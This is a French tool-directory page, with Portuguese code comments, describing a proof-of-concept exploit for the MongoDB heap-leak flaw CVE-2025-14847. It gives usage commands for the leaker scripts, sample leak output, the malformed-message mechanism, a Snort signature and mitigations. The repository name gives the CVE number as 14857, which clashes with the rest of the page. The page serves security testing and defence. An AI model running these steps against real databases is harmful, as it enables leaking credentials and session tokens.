Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-14857-MongoBleed — Exploit fonctionnel de preuve de concept pour CVE-2025-14847 (MongoBleed), une vulnérabilité de divulgation de mémoire tas avant authentification dans MongoDB. Inclut la détection automatisée de fuites mémoire, l'analyse de motifs et un environnement de laboratoire basé sur Docker pour des tests de sécurité et des recherches autorisés. | Kitploit
Outils/GitHubGitHub/ermensonx/cve-2025-14857-mongobleed
Criminalistique MémoireAnalyse des VulnérabilitésExploitationTests d'IntrusionApprentissage et ÉducationSécurité des Bases de Données
GitHubermensonx/cve-2025-14857-mongobleed

CVE-2025-14857-MongoBleed

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Exploit fonctionnel de preuve de concept pour CVE-2025-14847 (MongoBleed), une vulnérabilité de divulgation de mémoire tas avant authentification dans MongoDB. Inclut la détection automatisée de fuites mémoire, l'analyse de motifs et un environnement de laboratoire basé sur Docker pour des tests de sécurité et des recherches autorisés.

6il y a 8 moisPas encore vérifié
Partager

CVE-2025-14847 (MongoBleed) - PoC Fonctionnelle

Exploitation de Fuite Mémoire dans MongoDB - Attaque R6 Simulée

CVE MongoDB Status Taxa

Preuve de Concept Complète pour CVE-2025-14847 (MongoBleed)
Testé : ✅ MongoDB 7.0.5 | 14.300+ Exploits Réussis | 4 UUIDs Fuités


🎯 À propos du Projet

Ce dépôt contient une Preuve de Concept (PoC) entièrement fonctionnelle pour la vulnérabilité CVE-2025-14847, connue sous le nom de MongoBleed, une faille critique de divulgation mémoire heap pré-authentification dans MongoDB.

Contexte : L'Incident de Rainbow Six Siege

En Décembre 2025, le jeu Rainbow Six Siege a subi une attaque massive qui a compromis ~50 000 comptes de joueurs. On soupçonne que des attaquants ont exploité cette vulnérabilité dans le MongoDB du backend pour fuiter :

  • 🔑 Jetons d'authentification serveur (R6S_SERVER_AUTH_*)
  • 👤 UUIDs de joueurs et identifiants de session
  • 🛡️ Drapeaux de privilèges administratifs (TOURNAMENT_ADMIN, DEV_BUILD_WHITELIST)

Cette PoC simule l'attaque avec des données réalistes de R6.


🔥 Fonctionnalités

  • ✅ Exploit 100% Fonctionnel contre MongoDB 7.0.5
  • ✅ 3 Outils d'Exploitation :
    • poc.py - Exploit principal avec analyse de motifs
    • live_leaker.py - Balayage incrémental avancé
    • popular_heap.py - Script pour remplir le heap avec des données cibles
  • ✅ Environnement Docker Complet avec MongoDB vulnérable
  • ✅ 1500+ Documents Simulés du backend R6
  • ✅ Détection Automatique de 10 motifs sensibles (JWT, jetons, UUIDs, IPs)
  • ✅ Rapports JSON structurés
  • ✅ Documentation Technique Complète (200+ pages)

📊 Résultats Validés

UUIDs Extraits (Preuve Réelle)

root@kitploit:~
246434ed-759b-4ce9-bb9c-2f520a9919b8
980ab3a7-0230-4718-aa2d-fb28feafd7f5
1052a310-4cdc-492f-9890-465d76baba9b
f20debfa-298d-48e3-b3b9-9a0e037c0fbd

🚀 Démarrage Rapide

Prérequis

  • Docker & Docker Compose
  • Python 3.8+

Installation

root@kitploit:~
# Clone o repositório
git clone CVE-2025-14857-MongoBleed.git
cd MongoDBPoc

# Inicie o ambiente vulnerável
docker-compose up -d

# Aguarde inicialização (15-20s)
docker logs cve-2025-14847-lab | grep "R6 MASSIVE"

Utilisation Basique

root@kitploit:~
# 1. Popular heap com dados R6
python3 popular_heap.py 50

# 2. Verificar vulnerabilidade
python3 poc.py --target 127.0.0.1 --check

# 3. Explorar com live leaker (RECOMENDADO)
timeout 30 python3 live_leaker.py --host 127.0.0.1 --min 200 --max 3000 --save results.json

Sortie Attendue

root@kitploit:~
[!] MongoBleed Live Leaker Avançado
[!] Alvo: 127.0.0.1:27017
[!] Faixa: doc_len 200 → 3000 (offset=500)

[*] Progresso: doc_len=245/3000 | Tentativas=100 | Taxa sucesso=100.0%

[!] PADRÕES R6 DETECTADOS (doc_len=245):
    [UUID] 1 novo(s):
      └─ 246434ed-759b-4ce9-bb9c-2f520a9919b8

🔬 Comment ça Marche

Mécanisme de la Vulnérabilité

MongoDB permet la compression des messages via zlib. La vulnérabilité réside dans la validation inadéquate de la taille déclarée par rapport à la taille réelle :

root@kitploit:~
Atacante → {compress: "zlib", uncompressedSize: 1MB, payload: <50 bytes>}
          ↓
Servidor aloca 1MB de heap  ← VULNERABILIDADE
          ↓
Servidor descomprime apenas 50 bytes
          ↓
Servidor retorna 1MB inteiro!
          └─ 50 bytes = dados reais
          └─ ~1MB - 50 = VAZAMENTO DE MEMÓRIA

Code Vulnérable (Simplifié)

root@kitploit:~
// ANTES DO PATCH
size_t uncompressedSize = header.uncompressedSize;  // ← Controlado pelo atacante
buffer = malloc(uncompressedSize);                  // ← Aloca tamanho malicioso
zlib_decompress(compressed, buffer);
send(buffer, uncompressedSize);                     // ← VAZA BUFFER INTEIRO

📂 Structure du Projet

root@kitploit:~
MongoDBPoc/
├── poc.py                          # Exploit principal
├── live_leaker.py                  # Varredura incremental (✨ Recomendado)
├── popular_heap.py                 # Script de carga
├── docker-compose.yml              # MongoDB 7.0.5 vulnerável
├── init-db.js                      # 1000 players + 500 sessions R6
├── GUIA_TECNICO_COMPLETO.md       # Documentação detalhada (200+ páginas)
├── README.MD                       # Documentação em inglês
└── Portugues/                      # Versões traduzidas
    ├── poc_PT.py
    ├── README_PT.md
    └── GUIA_RAPIDO.md

🛡️ Versions Affectées


🛡️ Détection et Défense

Signature Snort

root@kitploit:~
alert tcp any any -> any 27017 (
    msg:"CVE-2025-14847 MongoBleed Attempt";
    content:"|d4 07 00 00|";
    byte_test:4,>,1000000,4,little;
    sid:2025001;
)

Configuration Sécurisée (mongod.conf)

root@kitploit:~
net:
  bindIp: 127.0.0.1              # NUNCA 0.0.0.0!
  compression:
    compressors: []              # Desabilitar zlib

security:
  authorization: enabled

Priorités d'Atténuation

  1. 🔴 CRITIQUE : Mettre à jour vers la version corrigée
  2. 🟠 HAUTE : Désactiver la compression zlib
  3. 🟠 HAUTE : Segmentation réseau (firewall)
  4. 🟡 MOYENNE : Activer l'authentification

📚 Documentation

  • GUIA_TECNICO_COMPLETO.md - Analyse technique complète (200+ pages)

    • Contexte de l'incident R6
    • Mécanisme de la vulnérabilité
    • Code vulnérable vs. corrigé
    • Exécution pas à pas
    • Résultats et statistiques
    • Signatures IDS et durcissement
  • README.MD - Documentation principale (anglais)

  • Portugues/ - Versions traduites


⚠️ Avis Légal

root@kitploit:~
CET OUTIL EST UNIQUEMENT DESTINÉ À DES TESTS AUTORISÉS ET À L'ÉDUCATION.

Toute utilisation non autorisée est ILLÉGALE et peut entraîner :
- Des poursuites pénales (Loi 12.737/2012 au Brésil)
- De lourdes amendes
- Une peine d'emprisonnement

Obtenez toujours une AUTORISATION ÉCRITE avant de tester.

Utilisation Autorisée

  • ✅ Tests de pénétration avec autorisation écrite
  • ✅ Recherche académique dans des environnements isolés
  • ✅ Vérification des correctifs des fournisseurs
  • ✅ Formation des équipes de sécurité

Utilisation Interdite

  • ❌ Balayage ou attaque de systèmes sans permission
  • ❌ Accès à des bases de données de production
  • ❌ Vente ou armement de ce code

🙏 Crédits

Auteur : Ermenson Jr
Licence : MIT (Usage Éducatif)
Date : Janvier 2026

Références

  • MongoDB Security Advisory
  • CVE-2025-14847 NVD
  • Akamai SIRT: MongoBleed Analysis
  • Aikido Security

📧 Contact

Pour des questions techniques ou une collaboration en recherche en sécurité :

  • GitHub Issues : Utilisez l'onglet Issues de ce dépôt
  • Email Académique : Disponible sur le profil GitHub

🌟 Si Ce Projet Vous a Été Utile

  • ⭐ Donnez une étoile à ce dépôt
  • 🔄 Partagez avec la communauté de sécurité
  • 📝 Citez-le dans vos recherches académiques
  • 🐛 Signalez les bugs ou améliorations via Issues

Développé pour la recherche en sécurité offensive responsable.
Non affilié à Ubisoft, MongoDB Inc., ou Rainbow Six Siege.

🔒 Utilisez-le de manière responsable. La sécurité est pour tous. 🔒

Télécharger l’outil
MétriqueRésultat
MongoDB Testé7.0.5 (Vulnérable)
Taux de Succès100% (14 300/14 300 requêtes)
UUIDs Fuités4 uniques
Fuite Totale33 chaînes distinctes
Plus Grande Fuite176 octets/requête
Motifs DétectésJournaux réseau, UUIDs, chemins système
Série MongoDBVersions VulnérablesVersion Corrigée
8.2.x8.2.0 – 8.2.28.2.3
8.0.x8.0.0 – 8.0.168.0.17
7.0.x7.0.0 – 7.0.277.0.28
6.0.x6.0.0 – 6.0.266.0.27
5.0.x5.0.0 – 5.0.315.0.32
4.4.x4.4.0 – 4.4.294.4.30
≤ 4.2ToutesSans patch (EOL)